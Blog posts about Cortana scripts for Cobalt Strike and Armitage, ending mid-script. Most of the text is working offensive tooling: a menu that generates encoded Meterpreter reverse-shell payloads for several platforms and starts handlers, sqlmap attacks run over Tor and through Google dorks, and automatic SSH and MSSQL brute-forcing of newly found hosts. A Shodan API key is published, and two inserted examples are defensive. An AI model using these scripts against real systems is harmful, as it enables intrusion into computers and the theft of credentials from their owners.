Tuesday, December 10, 2013

Cobalt Strike Report Hosts *Mod*

Posted by at Tuesday, December 10, 2013


Cobalt Strike has a nice function called Report Hosts.

All “HOST/PORTS/OS/HASHES/EXPLOITS” information is exported into a single PDF file.


Now I want to change the logo at the top (you can't see it in the sample picture, sorry).

Original PDF Banner


My New PDF Banner


Cobalt Strike is written in Java, so we can simply extract the *.jar file with 7-Zip or other tools.

27.09.2012  14:26    <DIR>          armitage
27.09.2012 14:26 <DIR> cloudstrike
23.07.2010 09:00 <DIR> com
27.09.2012 14:26 <DIR> console
27.09.2012 14:26 <DIR> cortana
23.12.2011 17:48 <DIR> de
27.09.2012 14:26 <DIR> dns
27.09.2012 14:26 <DIR> endpoint
27.09.2012 14:26 <DIR> graph
27.09.2012 14:26 <DIR> images
19.11.2006 23:41 <DIR> javax
06.08.2005 17:14 <DIR> java_cup
04.09.2012 19:10 28.830 libtapmanager.so
04.09.2012 19:10 34.685 libtapmanager64.so
27.09.2012 14:26 <DIR> license
16.05.2004 02:02 10.317 LICENSE.txt
13.12.2010 18:49 574 log4j.properties
23.07.2012 09:11 <DIR> mail
27.09.2012 14:26 <DIR> META-INF
27.09.2012 14:26 <DIR> msf
14.11.2011 14:21 <DIR> nl
16.05.2004 02:02 622 NOTICE.TXT
02.07.2010 14:04 <DIR> org
27.09.2012 14:26 <DIR> profiler
27.09.2012 14:26 <DIR> report
27.09.2012 14:26 <DIR> resources
27.09.2012 14:26 <DIR> scripts
27.09.2012 14:26 <DIR> scripts-cortana
24.05.2009 00:19 <DIR> sleep
27.09.2012 14:26 <DIR> ssl
27.09.2012 14:26 <DIR> table
27.09.2012 14:26 <DIR> tap
27.09.2012 14:26 <DIR> template
27.09.2012 14:26 <DIR> templates
27.09.2012 14:26 <DIR> tree
27.09.2012 14:26 <DIR> ui

After extracting Cobalt Strike we can see the folder /images/. Now we can change the logo and simply repack it into a .jar file.


Now we can start Cobalt Strike again with your new logo.
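The same extract/modify/repack step, seen from the verification side: this added example (not from the original post) compares a repacked JAR with a known-good copy entry by entry, because a whole-file hash changes on any repack while per-entry digests isolate what was actually replaced. The entry names and contents are constructed sample data; `images/logo.png` is a hypothetical file name, since the post does not name the logo file.

```python
import hashlib
import io
import zipfile


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


def jar_entry_digests(jar_bytes):
    """Map every file entry of a JAR (a ZIP archive) to the SHA-256 of its content."""
    digests = {}
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
        for info in jar.infolist():
            if not info.is_dir():
                digests[info.filename] = sha256_hex(jar.read(info))
    return digests


def diff_jars(reference, candidate):
    """Report entries added, removed or modified relative to the reference JAR."""
    ref, cand = jar_entry_digests(reference), jar_entry_digests(candidate)
    return {
        "added": sorted(cand.keys() - ref.keys()),
        "removed": sorted(ref.keys() - cand.keys()),
        "modified": sorted(n for n in ref.keys() & cand.keys() if ref[n] != cand[n]),
    }


def build_jar(entries, date_time, compression):
    """Build an in-memory JAR; stands in for the repack step (sample data only)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        for name, data in entries.items():
            info = zipfile.ZipInfo(name, date_time=date_time)
            info.compress_type = compression
            jar.writestr(info, data)
    return buf.getvalue()


# Constructed sample contents (hypothetical names, not the real archive).
ENTRIES = {
    "META-INF/MANIFEST.MF": b"Manifest-Version: 1.0\r\n\r\n",
    "images/logo.png": b"\x89PNG original banner bytes",
    "report/Report.class": b"\xca\xfe\xba\xbe constructed class bytes",
}
REFERENCE = build_jar(ENTRIES, (2012, 9, 27, 14, 26, 0), zipfile.ZIP_DEFLATED)
# Same content repacked by another tool: new timestamps, no compression.
REPACKED_SAME = build_jar(ENTRIES, (2013, 12, 10, 9, 0, 0), zipfile.ZIP_STORED)
# Repacked with a replaced logo, as in the procedure above.
REPACKED_LOGO = build_jar(
    {**ENTRIES, "images/logo.png": b"\x89PNG replacement banner bytes"},
    (2013, 12, 10, 9, 0, 0), zipfile.ZIP_DEFLATED)

if __name__ == "__main__":
    # The file hash differs even though no entry changed ...
    print(sha256_hex(REFERENCE) != sha256_hex(REPACKED_SAME))
    print(diff_jars(REFERENCE, REPACKED_SAME))
    # ... while the entry diff pinpoints the replaced image.
    print(diff_jars(REFERENCE, REPACKED_LOGO))
```
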


Before:


Activity Report by gotr00t


After :


Hosts Report by gotr00t


 


Have pfun if anybody needs it ;)

Three Days with Cortana Script Engine - Cobalt Strike/Armitage

Posted by at Tuesday, December 10, 2013


Auto Payload Menu meets Cobalt Strike Script Engine

Bored again, so I scripted a short payload menu for Cobalt/Armitage.


Source code:

# Multi Payload Menu Engine v0.1
# Contana Script Engine r0ckz.
# by cr4shyyyy
# from http://security-is-just-an-illusion.blogspot.de

menubar("Payloads", "payloads",2);

popup payloads {
menu "Windows Payloads" {
item "Reverse Meta x86" {
$ip = prompt_text("Enter Host for Reverse Tcp Payload");
$port = prompt_text("Enter Port for Reverse Tcp Payload");
$filehandler = prompt_text("Enter Filename for Reverse Tcp Payload");
if
($ip !is $null) {
show_message("Lets Pwn The Box!");
println("\n----------------------------------------\n\c4Create\c4 Meterpreter x86 Reverse Tcp Payload Now \n----------------------------------------");
$console = console();
$console = open_console_tab("Meterpreter x86 Reverse Tcp Payload");
cmd($console, "msfpayload windows/meterpreter/reverse_tcp LHOST=$ip LPORT=$port EXITFUNC=thread R | msfencode -e x86/shikata_ga_nai -c 2 -t raw | msfencode -e x86/jmp_call_additive -c 2 -t raw | msfencode -e x86/call4_dword_xor -c 2 -t raw | msfencode -e x86/jmp_call_additive -c 2 -t raw | msfencode -e x86/call4_dword_xor -c 2 -t exe -o /root/Desktop/$filehandler");
cmd($console, "use exploit/multi/handler");
cmd($console, "set LHOST $ip");
cmd($console, "set LPORT $port");
cmd($console, "set PAYLOAD windows/meterpreter/reverse_tcp");
cmd($console, "set Encoder x86/shikata_ga_nai");
cmd($console, "set EXITFUNC process");
cmd($console, "set ExitOnSession false");
cmd($console, "exploit -j");
println("----------------------------------------\n\c4Meterpreter\c4 x86 Reverse Tcp Payload Ready\n----------------------------------------");
println("\c9Meterpreter\c9 LHOST $ip");
println("\c9Meterpreter\c9 LPORT $port");
println("\c9Meterpreter\c9 PAYLOAD windows/meterpreter/reverse_tcp");
println("\c9Meterpreter\c9 Encoder x86/shikata_ga_nai");
println("\c9Meterpreter\c9 EXITFUNC process");
println("\c9Meterpreter\c9 FILEPATH /root/Desktop/$filehandler");
println("\n----------------------------------------\n\ Security is just an Illusion\n----------------------------------------");
}
}
item "Reverse Meta x64" {
$ip = prompt_text("Enter Host for Reverse Tcp Payload");
$port = prompt_text("Enter Port for Reverse Tcp Payload");
$filehandler = prompt_text("Enter Filename for Reverse Tcp Payload");
if
($ip !is $null) {
show_message("Lets Pwn The Box!");
println("\n----------------------------------------\n\c4Create\c4 Meterpreter x64 Reverse Tcp Payload Now \n----------------------------------------");
$console = console();
$console = open_console_tab("Meterpreter x64 Reverse Tcp Payload");
cmd($console, "msfpayload windows/x64/meterpreter/reverse_tcp LHOST=$ip LPORT=$port X | msfencode -c 10 -e x86/shikata_ga_nai > /root/Desktop/$filehandler");
cmd($console, "use exploit/multi/handler");
cmd($console, "set LHOST $ip");
cmd($console, "set LPORT $port");
cmd($console, "set PAYLOAD windows/x64/meterpreter/reverse_tcp");
cmd($console, "set Encoder x86/shikata_ga_nai");
cmd($console, "set EXITFUNC process");
cmd($console, "set ExitOnSession false");
cmd($console, "exploit -j");
println("----------------------------------------\n\c4Meterpreter\c4 x64 Reverse Tcp Payload Ready\n----------------------------------------");
println("\c9Meterpreter\c9 LHOST $ip");
println("\c9Meterpreter\c9 LPORT $port");
println("\c9Meterpreter\c9 PAYLOAD windows/meterpreter/reverse_tcp");
println("\c9Meterpreter\c9 Encoder x64/shikata_ga_nai");
println("\c9Meterpreter\c9 EXITFUNC process");
println("\c9Meterpreter\c9 FILEPATH /root/Desktop/$filehandler");
println("\n----------------------------------------\n\ Security is just an Illusion\n----------------------------------------");
}
}
}
menu "Android Payloads" {
item "Reverse Meta Java" {
$ip = prompt_text("Enter Host for Android Reverse Tcp Payload");
$port = prompt_text("Enter Port for Reverse Tcp Payload");
$filehandler = prompt_text("Enter Android Filename for Reverse Tcp Payload");
if
($ip !is $null) {
show_message("Lets Pwn The Box!");
println("\n----------------------------------------\n\c4Create\c4 Meterpreter Android Reverse Tcp Payload Now \n----------------------------------------");
$console = console();
$console = open_console_tab("Meterpreter Android Reverse Tcp Payload");
cmd($console, "msfpayload android/meterpreter/reverse_tcp LHOST=$ip LPORT=$port R > /root/Desktop/$filehandler");
cmd($console, "use exploit/multi/handler");
cmd($console, "set LHOST $ip");
cmd($console, "set LPORT $port");
cmd($console, "set PAYLOAD android/meterpreter/reverse_tcp");
cmd($console, "exploit -j");
println("----------------------------------------\n\c4Meterpreter\c4 Android Reverse Tcp Payload Ready\n----------------------------------------");
println("\c9Meterpreter\c9 LHOST $ip");
println("\c9Meterpreter\c9 LPORT $port");
println("\c9Meterpreter\c9 PAYLOAD android/meterpreter/reverse_tcp");
println("\c9Meterpreter\c9 FILEPATH /root/Desktop/$filehandler");
println("\n----------------------------------------\n\ Security is just an Illusion\n----------------------------------------");
}
}
}
menu "Linux Payloads" {
item "Reverse Meta x86" {
$ip = prompt_text("Enter Host for Linux Reverse Tcp Payload");
$port = prompt_text("Enter Port for Linux Tcp Payload");
$filehandler = prompt_text("Enter Filename for Reverse Tcp Payload");
if
($ip !is $null) {
show_message("Lets Pwn The Box!");
println("\n----------------------------------------\n\c4Create\c4 Meterpreter Linux Reverse Tcp Payload Now \n----------------------------------------");
$console = console();
$console = open_console_tab("Meterpreter Linux Reverse Tcp Payload");
cmd($console, "msfpayload linux/x86/meterpreter/reverse_tcp LHOST=$ip LPORT=$port X > /root/Desktop/$filehandler");
cmd($console, "use exploit/multi/handler");
cmd($console, "set LHOST $ip");
cmd($console, "set LPORT $port");
cmd($console, "set PAYLOAD linux/x86/meterpreter/reverse_tcp");
cmd($console, "exploit -j");
println("----------------------------------------\n\c4Meterpreter\c4 Linux Reverse Tcp Payload Ready\n----------------------------------------");
println("\c9Meterpreter\c9 LHOST $ip");
println("\c9Meterpreter\c9 LPORT $port");
println("\c9Meterpreter\c9 PAYLOAD linux/x86/meterpreter/reverse_tcp");
println("\c9Meterpreter\c9 FILEPATH /root/Desktop/$filehandler");
println("\n----------------------------------------\n\ Security is just an Illusion\n----------------------------------------");
}
}
item "Reverse Shell x64" {
$ip = prompt_text("Enter Host for Linux Reverse Tcp Payload");
$port = prompt_text("Enter Port for Linux Tcp Payload");
$filehandler = prompt_text("Enter Filename for Reverse Tcp Payload");
if
($ip !is $null) {
show_message("Lets Pwn The Box!");
println("\n----------------------------------------\n\c4Create\c4 Shell Linux x64 Reverse Shell Payload Now \n----------------------------------------");
$console = console();
$console = open_console_tab("Shell Linux Reverse Shell Payload");
cmd($console, "msfpayload linux/x64/shell_reverse_tcp LHOST=$ip LPORT=$port X > /root/Desktop/$filehandler");
cmd($console, "use exploit/multi/handler");
cmd($console, "set LHOST $ip");
cmd($console, "set LPORT $port");
cmd($console, "set PAYLOAD linux/x64/shell_reverse_tcp");
cmd($console, "exploit -j");
println("----------------------------------------\n\c4Shell\c4 Linux x64 Reverse Shell Payload Ready\n----------------------------------------");
println("\c9Meterpreter\c9 LHOST $ip");
println("\c9Meterpreter\c9 LPORT $port");
println("\c9Meterpreter\c9 PAYLOAD linux/x64/shell_reverse_tcp");
println("\c9Meterpreter\c9 FILEPATH /root/Desktop/$filehandler");
println("\n----------------------------------------\n\ Security is just an Illusion\n----------------------------------------");
}
}
}
menu "OSX Payloads" {
item "Reverse iSight" {
$ip = prompt_text("Enter Host for OSX Reverse Tcp Payload");
$port = prompt_text("Enter Port for OSX Tcp Payload");
$filehandler = prompt_text("Enter Filename for Reverse Tcp Payload");
if
($ip !is $null) {
show_message("Lets Pwn The Box!");
println("\n----------------------------------------\n\c4Create\c4 OSX iSight Reverse Tcp Payload Now \n----------------------------------------");
$console = console();
$console = open_console_tab("OSX iSight Reverse Tcp Payload");
cmd($console, "msfpayload osx/x86/isight/reverse_tcp LHOST=$ip LPORT=$port X > /root/Desktop/$filehandler");
cmd($console, "use exploit/multi/handler");
cmd($console, "set LHOST $ip");
cmd($console, "set LPORT $port");
cmd($console, "set PAYLOAD osx/x86/isight/reverse_tcp");
cmd($console, "exploit -j");
println("----------------------------------------\n\c4OSX iSight \c4Reverse Tcp Payload Ready\n----------------------------------------");
println("\c9Meterpreter\c9 LHOST $ip");
println("\c9Meterpreter\c9 LPORT $port");
println("\c9Meterpreter\c9 PAYLOAD osx/x86/isight/reverse_tcp");
println("\c9Meterpreter\c9 FILEPATH /root/Desktop/$filehandler");
println("\n----------------------------------------\n\ Security is just an Illusion\n----------------------------------------");
}
}
}
menu "PHP Payloads" {
item "Reverse Meta PHP" {
$ip = prompt_text("Enter Host for PHP Reverse Tcp Payload");
$port = prompt_text("Enter Port for PHP Tcp Payload");
$filehandler = prompt_text("Enter Filename for Reverse Tcp Payload");
if
($ip !is $null) {
show_message("Lets Pwn The Box!");
println("\n----------------------------------------\n\c4Create\c4 Meterpreter PHP Reverse Tcp Payload Now \n----------------------------------------");
$console = console();
$console = open_console_tab("Meterpreter PHP Reverse Tcp Payload");
cmd($console, "msfpayload php/meterpreter_reverse_tcp LHOST=$ip LPORT=$port R | msfencode -c 1 -e php/base64 -t raw -o /root/Desktop/$filehandler");
cmd($console, "use exploit/multi/handler");
cmd($console, "set LHOST $ip");
cmd($console, "set LPORT $port");
cmd($console, "set PAYLOAD php/meterpreter_reverse_tcp");
cmd($console, "set AutoSystemInfo 1");
cmd($console, "exploit -j");
println("----------------------------------------\n\c4Meterpreter\c4 PHP Reverse Tcp Payload Ready\n----------------------------------------");
println("\c9Meterpreter\c9 LHOST $ip");
println("\c9Meterpreter\c9 LPORT $port");
println("\c9Meterpreter\c9 PAYLOAD php/meterpreter_reverse_tcp");
println("\c9Meterpreter\c9 FILEPATH /root/Desktop/$filehandler");
println("\n----------------------------------------\n\ Security is just an Illusion\n----------------------------------------");
}
}
}
}

Saturday, December 7, 2013

Two Days with Cortana Script Engine - Cobalt Strike/Armitage

Posted by at Saturday, December 07, 2013


Shodanhq meets Cobalt Strike Script Engine

Maybe somebody can use it: just a simple interface script for the Shodan search engine.

Here are some screenshots:


Enter a search word like “ssh2”


Be Happy ;)


Simple script to parse all IPs. Sorry, I'm not a dev pro ;) No auto-adding of IPs at the moment... maybe sometime.


Add hosts via copy & paste


Happy Hunting ---->

It's a little bit buggy but it works.

Source code:

# Shodan API Query for Cobalt Engine v0.1
# Contana Script Engine r0ckz.
# by cr4shyyy
# from http://security-is-just-an-illusion.blogspot.de

println("\n----------------------------------------\n\c4[*] Shodan API Query for Cobalt Engine v0.1 Loaded [*] \n----------------------------------------");

menubar("Web ToolKit", "webstuff",2);

popup webstuff {
menu "Shodan Search" {
item "Query Shodan Api" {

$ip = prompt_text("Enter Search Query");
$output = prompt_text("Enter File Name Log File Saved on Desktop");
if
($ip !is $null) {
show_message("Lets Pwn The Box!");

println("\n----------------------------------------\n\c4[*] Get Targets from Shodan API \n----------------------------------------");
$console = console();
$console = open_console_tab("Get Targets from Shodan API");
cmd($console, "use auxiliary/gather/shodan_search");
cmd($console, "set MAXPAGE 5");
cmd($console, "set SHODAN_APIKEY W6UgwFqFuejJvAEOZuRX5Jd6vXrbfN72");
cmd($console, "set QUERY $ip");
cmd($console, "set DATABASE 1");
cmd($console, "set OUTFILE /root/Desktop/$output");
cmd($console, "set VHOST www.shodanhq.com");
cmd($console, "run -j");
sleep(10 * 1000);
}
cmd($console, "python /root/Desktop/shoda.py /root/Desktop/$output");
db_sync();
}
}
}

 


Split IPs from log file:

 


#!/usr/bin/env python3
#########################################################################
# ___ _ _ _____ ___ ____ __
# / __)( )_( )( _ )/ __)( _ \( )
# \__ \ ) _ ( )(_)( ( (_-.) / )(__
# (___/(_) (_)(_____)\___/(_)\_)(____) V0.21
# -some code borrowed from >> https://developers.shodan.io/index.html
# -rest created/mixed up by FIZZLESTICK
# -trollsohard[at]rebelbas.es
#
# MORE INFO COMING
#
# [changelog]
# 9/25/2013 v0.2 - written up for RC worth.. needs some IP/vs DNS handling
# 10/11/2013 v0.21 - cleaned up host output a bit, banners, formatting
#########################################################################

# import the necessary modules
import re   # for regular expressions - to match IPs
import sys  # for parsing command line opts

# dotted-quad candidates; the octet range is checked separately below
IP_RE = re.compile(r'\b(?:\d{1,3}\.){3}\d{1,3}\b')


def is_ipv4(candidate):
    # reject matches such as 999.1.1.1 that the regex alone lets through
    return all(int(octet) <= 255 for octet in candidate.split('.'))


# I need to probably make this more pythonic but am working on that...
# if file is specified on command line, parse, else ask for file
if sys.argv[1:]:
    logfile = sys.argv[1]
else:
    logfile = input("Please enter a file to parse, e.g /var/log/secure: ")

try:
    # create an empty list
    ips = []
    # open the file and read through it line by line
    with open(logfile, "r") as handle:
        for text in handle:
            # a line can hold several addresses, so handle each match on its own
            for addy in IP_RE.findall(text):
                # if the address is valid and not already in the ips list, append
                if is_ipv4(addy) and addy not in ips:
                    ips.append(addy)

    # loop through the list, one address per output line
    for ip in ips:
        print(ip)
# catch any standard error (we can add more later)
except IOError as err:
    print("I/O Error(%s) : %s" % (err.errno, err.strerror))

INFO: Feel free to use my API key :)


Friday, December 6, 2013

One Day with Cortana Script Engine - Cobalt Strike/Armitage

Posted by at Friday, December 06, 2013


Today I worked a little bit with the Cobalt Strike 21-day demo.

A really great pentest tool, like Armitage: http://www.advancedpentest.com/

After some time I found the Script menu in Cobalt Strike, so let's google what we can do with the script engine.

After a while I found a great PDF doc about the Cortana script engine. Download the PDF here: cortana_tutorial.pdf

Now let's play with it.

 

Cortana Script Engine Lesson 1

Custom Armitage Menu via Cortana scripts

# Contana-Info Sites Engine v0.1
# Contana Script Engine r0ckz.
# by cr4shyyy
# from http://security-is-just-an-illusion.blogspot.de

menubar("Web ToolKit", "webstuff",2);

popup webstuff {
menu "Info Sites" {
item "Security is just an Illusion" {
url_open("http://security-is-just-an-illusion.blogspot.de/");
}
item "TheHackerNews" {
url_open("http://thehackernews.com/");
}
item "Securitytube" {
url_open("http://www.securitytube.net");
}
item "Shodanhq" {
url_open("http://www.shodanhq.com/");
}
item "Exploit-db" {
url_open("http://www.exploit-db.com/");
}
item "1337day" {
url_open("http://1337day.com/");
}
item "Privatepaste" {
url_open("http://privatepaste.com/");
}
item "Hash-cracker.com" {
url_open("http://www.hash-cracker.com/");
}
item "Rainbowtables.it64.com" {
url_open("http://rainbowtables.it64.com/");
}
item "X-attack.net" {
url_open("https://www.x-attack.net/?rtcrack");
}
}
}



Cortana Script Engine Lesson 2

Custom Armitage Tor Network Menu via Cortana scripts

# Contana-Tor Network Engine v0.1
# Contana Script Engine r0ckz.
# by cr4shyyy
# from http://security-is-just-an-illusion.blogspot.de


menubar("Web ToolKit", "webstuff",2);

popup webstuff {
menu "Tor Engine" {
item "Start Tor" {
println("\n----------------------------------------\n\c4Starting\c4 Tor-Network\nIP: \c9127.0.0.1:9050\c9 \n----------------------------------------");
$console = console();
$console = open_console_tab("Start Tor NetWork");
cmd($console, "tor");
#sleep(30 * 1000);
db_sync()
}
item "Kill Tor" {
println("\n----------------------------------------\n\c4Stop\c4 Tor-Network\nIP: \c9127.0.0.1:9050\c9 \n----------------------------------------");
$console = console();
$console = open_console_tab("Kill Tor NetWork");
cmd($console, "killall tor");
#sleep(30 * 1000);
db_sync()
}
item "Restart Tor" {
println("\n----------------------------------------\n\c4Restart\c4 Tor-Network\nIP: \c9127.0.0.1:9050\c9 \n----------------------------------------");
$console = console();
$console = open_console_tab("Restart Tor NetWork");
cmd($console, "killall tor && tor");
#sleep(30 * 1000);
db_sync()
}
}
}



Cortana Script Engine Lesson 2

Custom Armitage Sqlmap Interface Menu via Cortana scripts

# Contana-Sqlmap Interface Engine v0.1
# Contana Script Engine r0ckz.
# by cr4shyyy
# from http://security-is-just-an-illusion.blogspot.de
# Change Gnome Profile to avoid terminal close after exploit

println("\n----------------------------------------\n\c4[*] Contana-Sqlmap Engine v0.1 Loaded [*] \n----------------------------------------");

menubar("Web ToolKit", "webstuff",2);

popup webstuff {
menu "Sqlmap" {
item "Attack" {

$ip = prompt_text("Target + option --dbs ?");
if
($ip !is $null) {
show_message("Lets Pwn The Box!");
println("\n----------------------------------------\n\c4Attack\c4 with Sqlmap\nIP: \c9$ip\c9 \n----------------------------------------");
$console = console();
cmd($console, "gnome-terminal -x sqlmap --random-agent -u $ip ;bash");
db_sync()
}
}
item "Attack over Tor" {

$ip = prompt_text("Target + option --dbs ?");
if
($ip !is $null) {
show_message("Lets Pwn The Box!");
println("\n----------------------------------------\n\c4Attack\c4 with Sqlmap over Tor-Network\nIP: \c9$ip\c9 \n----------------------------------------");
$console = console();
cmd($console, "gnome-terminal -x sqlmap --random-agent --tor --tor-type=socks4 --tor-port=9050 -u $ip ;bash");
db_sync()
}
}
item "Attack with GDork" {

$ip = prompt_text("Target + option --dbs inurl:gallery.php?id= ?");
if
($ip !is $null) {
show_message("Lets Pwn The Box!");
println("\n----------------------------------------\n\c4Attack\c4 with Sqlmap with google Dorks\nIP: \c9$ip\c9 \n----------------------------------------");
$console = console();
cmd($console, "gnome-terminal -x sqlmap --random-agent -g $ip ;bash");
db_sync()
}
}
item "Attack with GDork over Tor" {

$ip = prompt_text("Target + option --dbs inurl:gallery.php?id= ?");
if
($ip !is $null) {
show_message("Lets Pwn The Box!");
println("\n----------------------------------------\n\c4Attack\c4 with Sqlmap with Google Dorks over Tor-Network\nIP: \c9$ip\c9 \n----------------------------------------");
$console = console();
cmd($console, "gnome-terminal -x sqlmap --random-agent --tor --tor-type=socks4 --tor-port=9050 -g $ip ;bash");
db_sync()
}
}
item "GDorks List" {
url_open("http://pastebin.com/raw.php?i=QFhBYbPw");
}
}
}




Cortana Script Engine Lesson 3

Custom Armitage on Host add Auto TCP Port Quick Scan via Cortana scripts

# Contana-Quick-Scan Engine v0.1
# Contana Script Engine r0ckz.
# by cr4shyyy
# from http://security-is-just-an-illusion.blogspot.de

println("\n----------------------------------------\n\c4[*] Contana-Quick-Scan Engine v0.1 Loaded [*] \n----------------------------------------");

# Preform auto scan
on host_add {
sleep(10 * 1000);
println("\n----------------------------------------\n\c4[*] Scanning New Host \nIP : \c9$1\c9\n----------------------------------------");
$console = console();
#$console = open_console_tab("Scanning New Host");
cmd($console, "use auxiliary/scanner/portscan/tcp");
cmd($console, "set THREADS 100");
cmd($console, "set PORTS 21, 22, 23, 25, 80, 110, 143, 443, 445, 1433, 3306, 4899, 5800, 5801, 8080");
cmd($console, "set RHOSTS $1");
cmd($console, "run -j");
cmd($console, "use auxiliary/scanner/discovery/udp_sweep");
cmd($console, "set THREADS 100");
cmd($console, "set BATCHSIZE 256");
cmd($console, "set RHOSTS $1");
cmd($console, "run -j");
#sleep(30 * 1000);
db_sync();
}

on service_add_21 {
println("\n----------------------------------------\n\c4[*] FTP-SERVER FOUND \nIP : \c9$1\c9\nPort : 21 Open\n----------------------------------------");
}

on service_add_22 {
println("\n----------------------------------------\n\c4[*] SSH-SERVER FOUND \nIP : \c9$1\c9\nPort : 22 Open\n----------------------------------------");
}

on service_add_23 {
println("\n----------------------------------------\n\c4[*] TELNET-SERVER FOUND \nIP : \c9$1\c9\nPort : 23 Open\n----------------------------------------");
}

on service_add_25 {
println("\n----------------------------------------\n\c4[*] SMTP-SERVER FOUND \nIP : \c9$1\c9\nPort : 25 Open\n----------------------------------------");
}

on service_add_80 {
println("\n----------------------------------------\n\c4[*] WEB-SERVER FOUND \nIP : \c9$1\c9\nPort : 80 Open\n----------------------------------------");
}

on service_add_110 {
println("\n----------------------------------------\n\c4[*] POP3-SERVER FOUND \nIP : \c9$1\c9\nPort : 110 Open\n----------------------------------------");
}

on service_add_143 {
println("\n----------------------------------------\n\c4[*] IMAP-SERVER FOUND \nIP : \c9$1\c9\nPort : 143 Open\n----------------------------------------");
}

on service_add_443 {
println("\n----------------------------------------\n\c4[*] HTTPS-SERVER FOUND \nIP : \c9$1\c9\nPort : 443 Open\n----------------------------------------");
}

on service_add_445 {
println("\n----------------------------------------\n\c4[*] MICROSOFT-DS-SERVER FOUND \nIP : \c9$1\c9\nPort : 445 Open\n----------------------------------------");
}

on service_add_1433 {
println("\n----------------------------------------\n\c4[*] MS-SQL-SERVER FOUND \nIP : \c9$1\c9\nPort : 1433 Open\n----------------------------------------");
}

on service_add_3306 {
println("\n----------------------------------------\n\c4[*] MYSQL-SERVER FOUND \nIP : \c9$1\c9\nPort : 3306 Open\n----------------------------------------");
}

on service_add_4899 {
println("\n----------------------------------------\n\c4[*] RADMIN-SERVER FOUND \nIP : \c9$1\c9\nPort : 4899 Open\n----------------------------------------");
}

on service_add_5800 {
println("\n----------------------------------------\n\c4[*] VNC-SERVER FOUND \nIP : \c9$1\c9\nPort : 5800 Open\n----------------------------------------");
}

on service_add_5801 {
println("\n----------------------------------------\n\c4[*] VNC-SERVER FOUND \nIP : \c9$1\c9\nPort : 5801 Open\n----------------------------------------");
}

on service_add_8080 {
println("\n----------------------------------------\n\c4[*] Shared-Service-SERVER FOUND \nIP : \c9$1\c9\nPort : 8080 Open\n----------------------------------------");
}
# EOF



Cortana Script Engine Lesson 4

Custom Armitage on Host add  &&  port 22  found Auto Bruteforce via Cortana scripts

# Brute New Host with SSH Server Ready on it.
# by http://security-is-just-an-illusion.blogspot.de/

# Preform auto msf port scan
# by monstream00

on host_add {
sleep(10 * 1000);
println("[*] msfScanning New Host TCP/UDP on $1");
$console = console();
#$console = open_console_tab("TCP/UDPscan_$1"); #Debug use
cmd($console, "use auxiliary/scanner/portscan/tcp");
cmd($console, "set THREADS 100");
cmd($console, "set PORTS 21, 22, 80, 110, 143, 443, 445, 1433, 3306, 8080");
cmd($console, "set RHOSTS $1");
cmd($console, "run -j");
cmd($console, "use auxiliary/scanner/discovery/udp_sweep");
cmd($console, "set THREADS 100");
cmd($console, "set BATCHSIZE 256");
cmd($console, "set RHOSTS $1");
cmd($console, "run -j");
#sleep(30 * 1000);
db_sync();
}


on service_add_22 {
println("\n----------------------------------------\n\c4Attempting to bruteforce\c4 SSH-Server\nIP: \c9$1\c9 \n----------------------------------------");
auxiliary("scanner/ssh/ssh_login", @($1), %(
THREADS => '100',
STOP_ON_SUCCESS => '1',
USER_FILE => '/usr/share/metasploit-framework/data/wordlists/unix_users.txt',
PASS_FILE => '/usr/share/metasploit-framework/data/wordlists/unix_passwords.txt'));
}
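What the `service_add_22` handler above looks like in the target's sshd log, as an added detection example that is not part of the original post: many failed logins for many different user names from one source in a short window, and, because the script sets `STOP_ON_SUCCESS`, a successful login that ends the burst. The log lines, thresholds and function name are constructed for this example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample log (ISO-timestamp syslog format), not taken from the post.
SAMPLE_LOG = """\
2013-12-06T19:24:01+00:00 srv sshd[901]: Failed password for invalid user admin from 203.0.113.5 port 40001 ssh2
2013-12-06T19:24:02+00:00 srv sshd[902]: Failed password for root from 203.0.113.5 port 40002 ssh2
2013-12-06T19:24:03+00:00 srv sshd[903]: Failed password for invalid user test from 203.0.113.5 port 40003 ssh2
2013-12-06T19:24:04+00:00 srv sshd[904]: Failed password for invalid user oracle from 203.0.113.5 port 40004 ssh2
2013-12-06T19:24:05+00:00 srv sshd[905]: Failed password for root from 203.0.113.5 port 40005 ssh2
2013-12-06T19:24:06+00:00 srv sshd[906]: Failed password for backup from 203.0.113.5 port 40006 ssh2
2013-12-06T19:24:07+00:00 srv sshd[907]: Accepted password for backup from 203.0.113.5 port 40007 ssh2
2013-12-06T19:30:10+00:00 srv sshd[950]: Failed password for alice from 198.51.100.7 port 51000 ssh2
2013-12-06T19:30:15+00:00 srv sshd[951]: Failed password for alice from 198.51.100.7 port 51001 ssh2
2013-12-06T19:30:21+00:00 srv sshd[952]: Accepted password for alice from 198.51.100.7 port 51002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<src>\S+) port \d+"
)


def detect_bruteforce(log_text, window=timedelta(seconds=60),
                      min_failures=5, min_users=3):
    """Flag sources with many failures across several user names inside `window`.

    Returns {source_ip: {"failures": int, "users": set, "compromised": str|None}};
    "compromised" is the account of a successful login that follows the burst.
    """
    failures = defaultdict(deque)  # source -> (timestamp, user) of recent failures
    flagged = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.fromisoformat(m["ts"])
        src, user = m["src"], m["user"]
        recent = failures[src]
        # Drop failures that have aged out of the sliding window.
        while recent and ts - recent[0][0] > window:
            recent.popleft()
        if m["result"] == "Failed":
            recent.append((ts, user))
            users = {u for _, u in recent}
            # A typo-prone user fails on one name; a wordlist run hits many.
            if len(recent) >= min_failures and len(users) >= min_users:
                finding = flagged.setdefault(
                    src, {"failures": 0, "users": set(), "compromised": None})
                finding["failures"] = max(finding["failures"], len(recent))
                finding["users"] |= users
        elif src in flagged and recent:
            # Success directly after a flagged burst: treat the account as guessed.
            flagged[src]["compromised"] = user
    return flagged


if __name__ == "__main__":
    for source, finding in detect_bruteforce(SAMPLE_LOG).items():
        print(source, finding)
```
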



Brute New Host with MSSQL Server Ready on it

# Brute New Host with MSSQL Server Ready on it.
# by http://security-is-just-an-illusion.blogspot.de/

on service_add_1433 {
println("Attempting to brute force MSSQL-Server |$1|");
auxiliary("scanner/mssql/mssql_login", @($1), %(
USER_FILE => '/opt/framework3/msf3/data/wordlists/unix_users.txt',
